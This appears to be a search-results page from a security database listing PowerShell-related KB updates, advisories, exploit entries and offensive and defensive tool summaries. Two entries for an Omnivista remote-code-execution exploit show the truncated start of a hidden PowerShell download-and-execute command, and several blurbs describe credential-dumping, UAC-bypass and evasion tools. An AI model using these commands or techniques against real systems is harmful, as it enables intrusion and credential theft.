Lucene search
K

3059 matches found

Microsoft KB
Microsoft KB
added 2017/01/07 12:0 a.m.3 views

Cumulative update for Windows 10 Version 1607: August 23, 2016

Cumulative update for Windows 10 Version 1607: August 23, 2016 Summary This update includes improvements and fixes in the functionality of Windows 10 Version 1607. Windows 10 updates are cumulative. Therefore, this package contains all previously released fixes. If you have installed earlier...

6.9AI score
Exploits0
Microsoft KB
Microsoft KB
added 2017/01/07 12:0 a.m.27 views

Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager

Update Rollup 9 for System Center 2012 R2 Virtual Machine Manager Introduction This article describes the issues that are fixed in Update Rollup 9 for Microsoft System Center 2012 R2 Virtual Machine Manager. There are three updates available for System Center 2012 R2 Virtual Machine Manager: one...

6AI score
Exploits0
Microsoft KB
Microsoft KB
added 2017/01/07 12:0 a.m.12 views

An update is available for System Center Advisor: May 2012

An update is available for System Center Advisor: May 2012 Summary Microsoft has released the on-premises client Update Rollup 1 for Microsoft System Center Advisor. This update is dated May 22, 2012. This article describes the following information about the update: The issues that the update...

7.1AI score
Exploits0
Microsoft KB
Microsoft KB
added 2017/01/07 12:0 a.m.3 views

Cumulative Update for Windows Server 2016: September 26, 2016

Cumulative Update for Windows Server 2016: September 26, 2016 Summary This update includes improvements and fixes to enhance the functionality of Windows Server 2016. Known issues in this update Issue The installation of this update KB3192366 fails if the RSAT-RemoteAccess-Powershell feature is...

6.8AI score
Exploits0
n0where
n0where
added 2017/01/03 7:3 a.m.18 views

Exploit the Credentials Present in Files and Memory: PowerMemory

PowerMemory is a PowerShell post-exploitation tool. It uses Microsoft binaries and therefore is able to execute on a machine, even after the Device Guard Policies have been set. In the same way, it will bypass antivirus detection. PowerMemory can retrieve credentials information and manipulate...

0.5AI score
Exploits0References2
Metasploit
Metasploit
added 2016/12/20 3:38 a.m.53 views

Windows 'Run As' Using Powershell

This module will start a process as another user using powershell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows 'Run As' Using Powershell', 'Description' = %q This module will start...

7.3AI score
Exploits0
CNVD
CNVD
added 2016/12/08 12:0 a.m.1 views

Microsoft PowerShell XML External Entity Injection Vulnerability

Microsoft PowerShell is a command line scripting environment that runs on windows machines to automate system and application management. An XML external entity injection vulnerability exists in Microsoft PowerShell, which can be exploited by an attacker to obtain sensitive information and execut...

7.6AI score
Exploits0References1
seebug.org
seebug.org
added 2016/12/06 12:0 a.m.34 views

Alcatel Lucent Omnivista 8770 Remote Code Execution(CVE-2016-9796)

No description provided by source. import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...

10CVSS9.2AI score0.23667EPSS
Exploits4
exploitpack
exploitpack
added 2016/12/06 12:0 a.m.35 views

Microsoft PowerShell - XML External Entity Injection

Microsoft PowerShell - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product:...

7.8AI score
Exploits0
Packet Storm
Packet Storm
added 2016/12/06 12:0 a.m.87 views

Microsoft PowerShell XXE Injection

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows...

7.4AI score
Exploits0
0day.today
0day.today
added 2016/12/06 12:0 a.m.47 views

Microsoft PowerShell - XML External Entity Injection Vulnerability

Exploit for windows platform in category local exploits + Credits: John Page aka hyp3rlinx Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows PowerShell and PowerShell Core is a task automation and configuration management framework from...

6.8AI score
Exploits0
Exploit DB
Exploit DB
added 2016/12/06 12:0 a.m.73 views

Microsoft PowerShell - XML External Entity Injection

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt + ISR: ApparitionSec Vendor: ================= www.microsoft.com Product: =========== PowerShell PowerShell including Windows...

7.4AI score
Exploits0
n0where
n0where
added 2016/12/05 2:47 a.m.13 views

WinAPI User Hunter: hunter

WinAPI User Hunter During Red Team engagements it is common to track/hunt specific users. Assuming we already have access to a desktop as a normal user no matter how, always “assume compromise” in a Windows Domain and we want to spread laterally. We want to know where the user is logged on, if he...

7AI score
Exploits0References2
Packet Storm
Packet Storm
added 2016/12/05 12:0 a.m.56 views

Alcatel Lucent Omnivista 8770 Remote Code Execution

import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...

0.5AI score0.23667EPSS
Exploits4
Packet Storm
Packet Storm
added 2016/12/02 12:0 a.m.52 views

Windows Escalate UAC Protection Bypass

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule 'Windows Escalate UAC Protection Bypass Via Eventvwr Regist...

0.3AI score
Exploits0
n0where
n0where
added 2016/12/01 8:43 p.m.708 views

Windows Anti Recon Tool: SAMRi10

Windows Anti Recon Tool “SAMRi10” tool is a short PowerShell PS script which alters remote SAM access default permissions on Windows 10 & Windows Server 2016. This hardening process prevents attackers from easily getting some valuable recon information to move laterally within their victim’s...

2.3AI score
Exploits0References3
n0where
n0where
added 2016/11/28 4:47 a.m.11 views

Human Interface Device Exploit Deployment: Brutal

Human Interface Device Exploit Deployment Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device Payload Teensy . Extremely useful for executing scripts on a target machine without the need for human-to-keyboard...

1.6AI score
Exploits0References2
Kitploit
Kitploit
added 2016/11/23 2:36 p.m.86 views

Brutal - Toolkit to quickly create various Payload, PowerShell Attack, Virus Attack and Launch Listener for a HID

Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction HID -ATTACK .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of...

7.4AI score
Exploits0References2
n0where
n0where
added 2016/11/14 6:24 a.m.102 views

PowerShell Digital Forensics: PowerForensics

PowerShell Digital Forensics The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems, and work has begun on Extended File System and HFS+ support. PowerForensics is built on a C Class...

1AI score
Exploits0References2
ThreatPost
ThreatPost
added 2016/10/31 3:57 p.m.19 views

Nymaim Dropper Updates Delivery, Obfuscation Methods

A new variant of the Nymaim dropper has been identified that includes updated delivery and obfuscation methods, and the use of PowerShell routines to download its payloads. The updated dropper, used primarily to download banking Trojans in the past, has also been spreading ransomware, according t...

0.1AI score
Exploits0References4
Rows per page
Query Builder